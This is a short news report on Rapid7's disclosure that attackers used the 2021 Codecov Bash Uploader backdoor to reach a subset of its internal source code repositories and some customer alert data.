As Rapid7 reported , unknown attackers gained access to a small portion of its source code repositories as a result of hacking into a software development tool from startup Codecov.
“An unauthorized party outside Rapid7 has gained unauthorized access to a small subset of our source code repositories for internal tools for our Managed Detection and Response service. These repositories contained some internal credentials that were overridden and alert related data for a subset of our MDR customers, ”the Rapid7 notice said.
On April 15, 2021, the developer of software audit tools, startup Codecov, warned users of its Bash Uploader tool that on January 31, unknown persons infected the tool with a backdoor. As it turned out later, as a result of the incident, the attackers were able to gain access to the networks of hundreds of Codecov clients.
Attackers managed to gain access to Codecov networks due to a startup error during the Docker image creation process, which allowed them to extract the credentials needed to modify the Bash Uploader script. The hackers made “periodic unauthorized changes” to the code, which allowed them to send information stored in the continuous integration (CI) environments of the script users to a third-party server.
According to the Rapid7 notice, there was no evidence that attackers were able to gain access to other corporate systems or production environments, or that any malicious changes were made to these repositories. According to the company, the use of the Bash Uploader was limited to a single CI server dedicated to testing and building some internal tools for the MDR service.